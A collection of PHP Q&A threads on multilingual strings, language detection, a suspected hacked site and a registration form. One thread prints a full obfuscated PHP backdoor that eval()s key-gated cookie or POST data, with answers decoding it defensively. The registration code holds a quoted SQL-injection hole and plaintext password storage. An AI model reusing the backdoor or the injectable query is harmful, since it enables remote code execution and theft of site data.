PHP storing multi-language strings inside an object - php

I'm using the following function to store user messages in two languages in JavaScript:
function user_messages(es_ES, en_EN)
{
    this.es_ES = es_ES;
    this.en_EN = en_EN;
}
var um_duplicated_input = new user_messages('Contenido duplicado', 'Duplicated content');
It may not be best practice, but it is being really handy for me to get user messages in my code by language, using the locale value. I would like to know how to achieve something as simple to declare and handle in PHP, instead of building new arrays all the time. I've been looking at stdClass but can't get it to work properly.

Despite the "help" of people like Alex Blex, who would rather question the user's legitimacy instead of helping them, here is a working approach for those who may be looking in the future for something similar (which I thought was the main purpose of this site). It could surely be better, but I don't know how to make it simpler or smarter.
class internal_message
{
    public $message = array();

    public function setMsg($index, $newval)
    {
        $this->message[$index] = $newval;
    }

    public function getMsg($index)
    {
        return $this->message[$index];
    }
}
This way you have to make a new declaration for every language, but in fact it is safer and clearer. I'm starting to feel really disappointed about this site, especially regarding topics like the English language quality of the posts: in my case, I'm Spanish, from Spain, and I dare you to speak Spanish as well as I speak English. I also speak German and Catalan. But this is not a place for languages; in fact, if somebody misspells something, it will enrich your database with content that somebody will also misspell when searching in Google.
I don't understand all this classism and attitude in recent times.
$error_message_wrong_pass = new internal_message;
$error_message_wrong_pass->setMsg("es_ES", "Password incorrecto");
$error_message_wrong_pass->setMsg("en_EN", "Wrong Password");
// To print one of them out
echo $error_message_wrong_pass->getMsg("es_ES");

Related

PHP Dynamic URL in Multilingual Web

Hi everybody, and thanks in advance for your help!
I have a multilingual site made in a similar way to this example. Everything is working just fine, but now I want the URL to change according to the language selected. For example, if my page is called perfil.php, when I select the English language it should be profile.php, and all the links in the site should translate to English too. I was looking at other questions, but the majority offer a solution through htaccess. This should work, but I need to store that configuration (or translations) in my database so the user can change it whenever they want.
Any ideas?
Thank you again!
You can use constants in some files called language files and then require/include them according to the selected language:
english.php
const PROFILE = "profile";
spanish.php
const PROFILE = "perfil";
main file:
require $language_selected . ".php";
echo '<a href="' . PROFILE . '.php">';
This part should be a comment (but it's a bit long).
The method described in the link you provided is a reasonable way to implement the choice of language, but a poor way to detect the choice.
Your browser already tells servers what language(s) it thinks they should respond in, and most web servers have a mechanism for multiplexing different language content. However, the latter means hard-wiring the choice of the browser without providing an easy means of overriding the behaviour.
The approach I have used before is something like this:
$use_lang = 'en-GB';
if (isset($_COOKIE['userlang'])
    && is_language_supported($_COOKIE['userlang'])) {
    $use_lang = $_COOKIE['userlang'];
} else if (isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])
    && ($proposedlang = supported_lang_in($_SERVER['HTTP_ACCEPT_LANGUAGE']))) {
    $use_lang = $proposedlang;
}

// is_language_supported($tag) is assumed to exist and to return true only
// for the languages the site actually ships.
function supported_lang_in($str)
{
    $l = array();
    $opts = explode(',', $str);
    foreach ($opts as $v) {
        $parts = explode(';', trim($v), 2);
        $p = trim($parts[0]);
        $weight = 1.0;
        if (isset($parts[1]) && preg_match('/^q=([0-9.]+)$/', trim($parts[1]), $m)) {
            $weight = (float) $m[1];
        }
        if ($weight <= 0) {
            continue; // q=0 means "not acceptable"
        }
        // string keys: a float key such as 0.8 would be truncated to 0
        while (isset($l["$weight"])) {
            $weight -= 0.001;
        }
        $l["$weight"] = $p;
    }
    krsort($l, SORT_NUMERIC); // preferred first
    foreach ($l as $proposed) {
        if ('*' == $proposed) {
            return false;
        }
        if (is_language_supported($proposed)) {
            return $proposed;
        }
    }
    return false;
}
Now on to the problem you asked about...
Maintaining different URLs to reference the same content and then dereferencing the language within the content seems a very byzantine solution to the problem. Not only do you have to map the input to the URL, but you need to rewrite any URLs in the output to the appropriate representation.
While having semantically meaningful URLs is a definite bonus, going to great lengths to tailor these dynamically is perhaps not the best use of your time.
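The two answers above put a user-influenced value (the selected language, a cookie, an Accept-Language entry) near a `require`. As an added example that is not from either answer: the selection logic rewritten so that whatever arrives from the client is only ever used as a key into a fixed table, never concatenated into a path, which is what turns a language picker into an arbitrary-file include. The language codes, file names and the `lang/` directory are assumptions for illustration; the header parsing follows the q-value weighting of Accept-Language. Needs PHP 7.4 or later.

```php
<?php
// Added example, not from either answer. Language selection where the
// user-controlled value (cookie or Accept-Language header) is only ever
// used as a key into a fixed table, never concatenated into a path.
declare(strict_types=1);

// Assumption: these are the languages the site ships and their message files.
const SUPPORTED_LANGS = [
    'en-GB' => 'english.php',
    'es-ES' => 'spanish.php',
];

function is_language_supported(string $lang): bool
{
    return isset(SUPPORTED_LANGS[$lang]);
}

// Parse an Accept-Language header, order entries by q-value (header order
// breaks ties) and return the first supported tag, or null if none matches
// or a wildcard is reached first.
function supported_lang_in(string $header): ?string
{
    $ranked = [];
    foreach (explode(',', $header) as $pos => $entry) {
        $parts = array_map('trim', explode(';', $entry));
        $tag = array_shift($parts);
        // Only well-formed tags (or '*') get any further: this also drops
        // anything containing '/', '.' or NUL that a path could pick up.
        if ($tag !== '*' && !preg_match('/^[A-Za-z]{1,8}(-[A-Za-z0-9]{1,8})*$/', $tag)) {
            continue;
        }
        $q = 1.0;
        foreach ($parts as $param) {
            if (preg_match('/^q=(0(\.\d{0,3})?|1(\.0{0,3})?)$/i', $param, $m)) {
                $q = (float) $m[1];
            }
        }
        if ($q <= 0.0) {
            continue;   // q=0 means "not acceptable"
        }
        $ranked[] = [$q, $pos, $tag];
    }
    usort($ranked, fn(array $a, array $b): int => ($b[0] <=> $a[0]) ?: ($a[1] <=> $b[1]));
    foreach ($ranked as [, , $tag]) {
        if ($tag === '*') {
            return null;
        }
        if (is_language_supported($tag)) {
            return $tag;
        }
    }
    return null;
}

function choose_language(array $cookie, array $server, string $default = 'en-GB'): string
{
    if (isset($cookie['userlang']) && is_string($cookie['userlang'])
        && is_language_supported($cookie['userlang'])) {
        return $cookie['userlang'];
    }
    if (isset($server['HTTP_ACCEPT_LANGUAGE']) && is_string($server['HTTP_ACCEPT_LANGUAGE'])) {
        $proposed = supported_lang_in($server['HTTP_ACCEPT_LANGUAGE']);
        if ($proposed !== null) {
            return $proposed;
        }
    }
    return $default;
}

$use_lang = choose_language($_COOKIE, $_SERVER);

// Table lookup, so a cookie of "../../../etc/passwd" can never reach require().
$langfile = __DIR__ . '/lang/' . SUPPORTED_LANGS[$use_lang];
if (is_file($langfile)) {
    require $langfile;   // defines constants such as PROFILE
}
```

The check that matters is the last three lines: `$use_lang` can only be one of the keys of `SUPPORTED_LANGS`, so the file name comes from the table and not from the request. The tag regex is a second line of defence for the Accept-Language path, and unknown or malformed cookie values simply fall through to the default.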

I found this strange code in the root directory. Does it mean my website was hacked?

I am sorry to ask a silly question, but I am not able to figure this out. I found a PHP file in my root directory with strange code. I know a little bit of PHP, but this is very strange code inside the PHP file. I am sure these are not PHP functions. I don't know what this code is about.
Is my website compromised? Can someone tell me what they can do with my website through this code? I am raising this question here because maybe it can help someone save their websites.
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['t7004'] = "\x2d\x23\x5f\x5d\x68\x45\x69\x3a\xa\x2e\x32\x39\x60\x35\x44\x9\x59\x6a\x7b\x50\xd\x7d\x57\x2b\x29\x53\x20\x7e\x56\x37\x48\x46\x70\x7c\x49\x4e\x52\x25\x26\x42\x5a\x30\x2a\x62\x51\x2f\x3c\x33\x4d\x79\x54\x3b\x6d\x74\x22\x65\x61\x71\x6f\x72\x5e\x63\x34\x5b\x78\x77\x4f\x58\x43\x47\x40\x66\x76\x41\x67\x31\x3d\x6e\x4c\x64\x55\x3f\x24\x73\x75\x36\x28\x3e\x21\x7a\x38\x2c\x6c\x4b\x27\x6b\x4a\x5c";
$GLOBALS[$GLOBALS['t7004'][79].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43]] = $GLOBALS['t7004'][61].$GLOBALS['t7004'][4].$GLOBALS['t7004'][59];
$GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][79];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][53].$GLOBALS['t7004'][59].$GLOBALS['t7004'][92].$GLOBALS['t7004'][55].$GLOBALS['t7004'][77];
$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][6].$GLOBALS['t7004'][77].$GLOBALS['t7004'][6].$GLOBALS['t7004'][2].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][53];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][41].$GLOBALS['t7004'][71].$GLOBALS['t7004'][10]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][6].$GLOBALS['t7004'][56].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][89].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][13].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90]] = $GLOBALS['t7004'][32].$GLOBALS['t7004'][4].$GLOBALS['t7004'][32].$GLOBALS['t7004'][72].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][83].$GLOBALS['t7004'][6].$GLOBALS['t7004'][58].$GLOBALS['t7004'][77];
$GLOBALS[$GLOBALS['t7004'][84].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55].$GLOBALS['t7004'][90].$GLOBALS['t7004'][61]] = $GLOBALS['t7004'][84].$GLOBALS['t7004'][77].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][6].$GLOBALS['t7004'][56].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][89].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56]] = $GLOBALS['t7004'][43].$GLOBALS['t7004'][56].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][85].$GLOBALS['t7004'][62].$GLOBALS['t7004'][2].$GLOBALS['t7004'][79].$GLOBALS['t7004'][55].$GLOBALS['t7004'][61].$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][74].$GLOBALS['t7004'][62].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][53].$GLOBALS['t7004'][2].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][55].$GLOBALS['t7004'][2].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][6].$GLOBALS['t7004'][53];
$GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][11].$GLOBALS['t7004'][56].$GLOBALS['t7004'][13].$GLOBALS['t7004'][47].$GLOBALS['t7004'][29].$GLOBALS['t7004'][61]] = $GLOBALS['t7004'][49].$GLOBALS['t7004'][75].$GLOBALS['t7004'][41].$GLOBALS['t7004'][10].$GLOBALS['t7004'][62].$GLOBALS['t7004'][13];
$GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]] = $GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][71].$GLOBALS['t7004'][13].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][4].$GLOBALS['t7004'][75].$GLOBALS['t7004'][79].$GLOBALS['t7004'][79].$GLOBALS['t7004'][85]] = $_POST;
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][56].$GLOBALS['t7004'][29].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10]] = $_COOKIE;
@$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][59].$GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][2].$GLOBALS['t7004'][92].$GLOBALS['t7004'][58].$GLOBALS['t7004'][74], NULL);
@$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][92].$GLOBALS['t7004'][58].$GLOBALS['t7004'][74].$GLOBALS['t7004'][2].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][59].$GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][83], 0);
@$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][52].$GLOBALS['t7004'][56].$GLOBALS['t7004'][64].$GLOBALS['t7004'][2].$GLOBALS['t7004'][55].$GLOBALS['t7004'][64].$GLOBALS['t7004'][55].$GLOBALS['t7004'][61].$GLOBALS['t7004'][84].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][58].$GLOBALS['t7004'][77].$GLOBALS['t7004'][2].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][55], 0);
@$GLOBALS[$GLOBALS['t7004'][74].$GLOBALS['t7004'][62].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62]](0);
$rcc6ec6 = NULL;
$e6ca3e0 = NULL;
$GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][90].$GLOBALS['t7004'][79].$GLOBALS['t7004'][29].$GLOBALS['t7004'][10].$GLOBALS['t7004'][90]] = $GLOBALS['t7004'][10].$GLOBALS['t7004'][85].$GLOBALS['t7004'][62].$GLOBALS['t7004'][61].$GLOBALS['t7004'][10].$GLOBALS['t7004'][56].$GLOBALS['t7004'][85].$GLOBALS['t7004'][55].$GLOBALS['t7004'][0].$GLOBALS['t7004'][71].$GLOBALS['t7004'][61].$GLOBALS['t7004'][55].$GLOBALS['t7004'][13].$GLOBALS['t7004'][0].$GLOBALS['t7004'][62].$GLOBALS['t7004'][62].$GLOBALS['t7004'][90].$GLOBALS['t7004'][85].$GLOBALS['t7004'][0].$GLOBALS['t7004'][90].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][75].$GLOBALS['t7004'][0].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][71].$GLOBALS['t7004'][62].$GLOBALS['t7004'][90].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][55].$GLOBALS['t7004'][29];
global $c6278d728;
function f7684f5ee($rcc6ec6, $r8c6)
{
$ua52559 = "";
for ($o4b1=0; $o4b1<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($rcc6ec6);)
{
for ($b1ad67b=0; $b1ad67b<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($r8c6) && $o4b1<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($rcc6ec6); $b1ad67b++, $o4b1++)
{
$ua52559 .= $GLOBALS[$GLOBALS['t7004'][79].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43]]($GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]]($rcc6ec6[$o4b1]) ^ $GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]]($r8c6[$b1ad67b]));
}
}
return $ua52559;
}
function y10245($rcc6ec6, $r8c6)
{
global $c6278d728;
return $GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]]($GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]]($rcc6ec6, $c6278d728), $r8c6);
}
foreach ($GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][56].$GLOBALS['t7004'][29].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10]] as $r8c6=>$ob6137983)
{
$rcc6ec6 = $ob6137983;
$e6ca3e0 = $r8c6;
}
if (!$rcc6ec6)
{
foreach ($GLOBALS[$GLOBALS['t7004'][4].$GLOBALS['t7004'][75].$GLOBALS['t7004'][79].$GLOBALS['t7004'][79].$GLOBALS['t7004'][85]] as $r8c6=>$ob6137983)
{
$rcc6ec6 = $ob6137983;
$e6ca3e0 = $r8c6;
}
}
$rcc6ec6 = @$GLOBALS[$GLOBALS['t7004'][84].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55].$GLOBALS['t7004'][90].$GLOBALS['t7004'][61]]($GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][11].$GLOBALS['t7004'][56].$GLOBALS['t7004'][13].$GLOBALS['t7004'][47].$GLOBALS['t7004'][29].$GLOBALS['t7004'][61]]($GLOBALS[$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56]]($rcc6ec6), $e6ca3e0));
if (isset($rcc6ec6[$GLOBALS['t7004'][56].$GLOBALS['t7004'][95]]) && $c6278d728==$rcc6ec6[$GLOBALS['t7004'][56].$GLOBALS['t7004'][95]])
{
if ($rcc6ec6[$GLOBALS['t7004'][56]] == $GLOBALS['t7004'][6])
{
$o4b1 = Array(
$GLOBALS['t7004'][32].$GLOBALS['t7004'][72] => @$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][13].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90]](),
$GLOBALS['t7004'][83].$GLOBALS['t7004'][72] => $GLOBALS['t7004'][75].$GLOBALS['t7004'][9].$GLOBALS['t7004'][41].$GLOBALS['t7004'][0].$GLOBALS['t7004'][75],
);
echo @$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][41].$GLOBALS['t7004'][71].$GLOBALS['t7004'][10]]($o4b1);
}
elseif ($rcc6ec6[$GLOBALS['t7004'][56]] == $GLOBALS['t7004'][55])
{
eval($rcc6ec6[$GLOBALS['t7004'][79]]);
}
exit();
}
(I'm not yet able to answer.)
I had similar code on a customer's website with a Joomla install, several times.
If your web host doesn't have a code checker that blacklists hacked files, you will have to search the whole public_html directory.
I had one recent case where the code included several new files in a WordPress install, across different folders, some hidden with even meaningful names. I had to go through every folder, check the files with the same date (the hacking date, i.e. the last modification) and go through each one to check whether it was completely malicious code or only partly.
But usually I radically delete sections and files with encrypted code; they generally are hacked files...
The code you have posted is obfuscated PHP. The string at the beginning with all the \x's in it is a hex representation of a string.
There is a neat site named "DDecode" I found here: Hex Decoder, which will attempt to do exactly what it says.
Plugging your code into that site we can see that the first part:
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['t7004'] = "\x2d\x23\x5f\x5d\x68\x45\x69\x3a\xa\x2e\x32\x39\x60\x35\x44\x9\x59\x6a\x7b\x50\xd\x7d\x57\x2b\x29\x53\x20\x7e\x56\x37\x48\x46\x70\x7c\x49\x4e\x52\x25\x26\x42\x5a\x30\x2a\x62\x51\x2f\x3c\x33\x4d\x79\x54\x3b\x6d\x74\x22\x65\x61\x71\x6f\x72\x5e\x63\x34\x5b\x78\x77\x4f\x58\x43\x47\x40\x66\x76\x41\x67\x31\x3d\x6e\x4c\x64\x55\x3f\x24\x73\x75\x36\x28\x3e\x21\x7a\x38\x2c\x6c\x4b\x27\x6b\x4a\x5c";
becomes:
<?php ${"GLOBALS"}['t7004'] = "-#_]hEi:\xa.29`5D\x9Yj{P\xd}W+)S ~V7HFp|INR%&BZ0*bQ/<3MyT;mt"eaqor^c4[xwOXCG@fvAg1=nLdU?$su6(>!z8,lK'kJ\";
I am not super familiar with PHP myself; however, we can see that a variable is being set here to a long, apparently random string. From there we can look at the rest of the code and see that it is almost entirely a series of references back to this initial string. In this way the attacker has hidden what their code is doing by making it appear nonsensical, which is the point of obfuscation, of course.
You could take the time to dereference all of those calls if you wanted to get a better idea of what the code is doing. Also, there may be some security researchers who would be interested in seeing this code and could possibly give you more insight into what it is doing.
As for the state of your website: if you didn't do this, then yes, the chances are high that it has been compromised, and you should, at a minimum, as the comments suggested:
roll back to a clean, known good version
update your host with any applicable patches
INFORM YOUR USERS! Especially since you are unsure what this code does, it is important to let your users know that your site has potentially been compromised, so they can take the appropriate actions.
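The answer above stops at "you could dereference all of those calls". As an added example that is not part of the question or either answer: a small script that does that dereferencing mechanically. Every `$GLOBALS['t7004'][N]` chain is looked up in the alphabet string (copied verbatim from the first line of the posted file) and replaced by the literal it spells, so the file becomes readable PHP. `$sample` below is a constructed excerpt of a few lines from the posted code, enough to show the output shape; run the function over the whole file for the full picture.

```php
<?php
// Added example, not part of the original question or answers: resolve the
// $GLOBALS['t7004'][N] index chains in the sample above back into literal
// strings so the script can be read. The alphabet is copied from the first
// line of the sample; $sample below is a constructed excerpt of its lines.
declare(strict_types=1);

$alphabet = "\x2d\x23\x5f\x5d\x68\x45\x69\x3a\xa\x2e\x32\x39\x60\x35\x44\x9\x59\x6a\x7b\x50\xd\x7d\x57\x2b\x29\x53\x20\x7e\x56\x37\x48\x46\x70\x7c\x49\x4e\x52\x25\x26\x42\x5a\x30\x2a\x62\x51\x2f\x3c\x33\x4d\x79\x54\x3b\x6d\x74\x22\x65\x61\x71\x6f\x72\x5e\x63\x34\x5b\x78\x77\x4f\x58\x43\x47\x40\x66\x76\x41\x67\x31\x3d\x6e\x4c\x64\x55\x3f\x24\x73\x75\x36\x28\x3e\x21\x7a\x38\x2c\x6c\x4b\x27\x6b\x4a\x5c";

// Replace every chain like $GLOBALS['t7004'][79].$GLOBALS['t7004'][75]...
// with the quoted string it spells. Chains used as array keys, e.g.
// $GLOBALS[$GLOBALS['t7004'][79]...], come out as $GLOBALS['d1be4b'].
function deobfuscate(string $src, string $alphabet, string $var = 't7004'): string
{
    $ref   = '\$GLOBALS\[\'' . preg_quote($var, '/') . '\'\]\[\d+\]';
    $chain = '/' . $ref . '(?:\s*\.\s*' . $ref . ')*/';
    return preg_replace_callback($chain, function (array $m) use ($alphabet): string {
        preg_match_all('/\[(\d+)\]/', $m[0], $idx);
        $s = '';
        foreach ($idx[1] as $i) {
            if ((int) $i >= strlen($alphabet)) {
                throw new RuntimeException("index $i outside the alphabet");
            }
            $s .= $alphabet[(int) $i];
        }
        return var_export($s, true);   // single-quoted, escapes \ and '
    }, $src);
}

// Constructed excerpt: a few of the posted lines, verbatim.
$sample = <<<'OBF'
$GLOBALS[$GLOBALS['t7004'][79].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43]] = $GLOBALS['t7004'][61].$GLOBALS['t7004'][4].$GLOBALS['t7004'][59];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][53].$GLOBALS['t7004'][59].$GLOBALS['t7004'][92].$GLOBALS['t7004'][55].$GLOBALS['t7004'][77];
$GLOBALS[$GLOBALS['t7004'][4].$GLOBALS['t7004'][75].$GLOBALS['t7004'][79].$GLOBALS['t7004'][79].$GLOBALS['t7004'][85]] = $_POST;
@$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][59].$GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][2].$GLOBALS['t7004'][92].$GLOBALS['t7004'][58].$GLOBALS['t7004'][74], NULL);
if (isset($rcc6ec6[$GLOBALS['t7004'][56].$GLOBALS['t7004'][95]]) && $c6278d728==$rcc6ec6[$GLOBALS['t7004'][56].$GLOBALS['t7004'][95]])
eval($rcc6ec6[$GLOBALS['t7004'][79]]);
OBF;

echo deobfuscate($sample, $alphabet);
```

Run over the whole posted file, the lookup resolves the helper globals to chr, ord, strlen, ini_set, serialize, phpversion, unserialize, base64_decode and set_time_limit; the two remaining globals are copies of $_POST and $_COOKIE, and the long value assigned to $c6278d728 is a fixed, UUID-shaped key. With those names in place the rest reads plainly: the four calls at the top disable error logging and the execution time limit; the script then takes the value of the last cookie (or, failing that, the last POST field), base64-decodes it, XORs it with the key and then with the parameter name, unserialize()s the result and, if the 'ak' element equals the key, either returns phpversion() (action 'i') or eval()s the 'd' element (action 'e'). That is a remote code-execution backdoor with a hard-coded password, so the advice above to restore from a known-good copy and tell your users stands; while you still have the file, its modification time and the web server's access log for requests carrying an unusual cookie or POST body are the quickest way to find out how long it has been there.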

How to make a registration form highly secure using PHP?

I want to make the code really secure for the users. The code below is the PHP code that I have used for my website. Right now I have some validation, such as password and repeatPassword having to match and the user having to fill in all the fields.
To make it more secure, I want to use secure commands such as PDO, mysqli, crypto or MD5, but I do not know how to, since I am new to PHP.
How can I do this?
My code is here:
<?php
include "config.php";
if (isset($_POST['submit']))
{
    $user_name = $_POST['name'];
    $user_surname = $_POST['surname'];
    $user_email = $_POST['email'];
    $user_academic = $_POST['academic_institute'];
    $user_username = $_POST['username'];
    $user_pass = $_POST['password'];
    $user_pass2 = $_POST['repeatPassword'];
    if ($user_name && $user_username)
    {
        if ($user_pass == $user_pass2)
        {
            // The request values go straight into the query text and the
            // password is stored in clear text; both are what the answer
            // below says to fix.
            $query = "INSERT INTO members (name, surname, email, academic_institute, username, password, repeatPassword)
                      VALUES ('$user_name', '$user_surname', '$user_email', '$user_academic', '$user_username', '$user_pass', '$user_pass2')";
            mysql_query($query);
            echo '<script type="text/javascript">alert("You have been registered");</script>';
        }
        else
        {
            echo '<script type="text/javascript">alert("Password must match");</script>';
        }
    }
    else
    {
        echo '<script type="text/javascript">alert("All fields required");</script>';
    }
}
?>
Not a "true" answer, but too long for the comment section, so I'll migrate it to an answer:
My original comment (slightly improved)
You probably want to start with: How can I prevent SQL injection in PHP?
And then continue with: Secure hash and salt for PHP passwords.
And then you want to fix your code style. Well-styled code is easier to read. Easy to read code is easier to understand. And the better you understand code, the better you can reason about security (or, indeed, correctness in general).
Also make sure you're serving the site over an SSL connection.
Your reply
@Carpetsmoker, can you quickly edit my code and try to make it secure? I read the links you gave me. Since I am new to PHP, I am struggling to understand. If you have time, can you please quickly edit my code? Thank you –
And my reply to that
I'm sorry, but no :-)
This is not a 'Please write my code'-site, you really have to do it yourself.
Don't get me wrong, I really appreciate that this task can be daunting and that you're struggling to grasp all the concepts. I've done plenty of struggling, and still do on occasion, but (unfortunately) this is part of the learning process. I know of no other way of doing it.
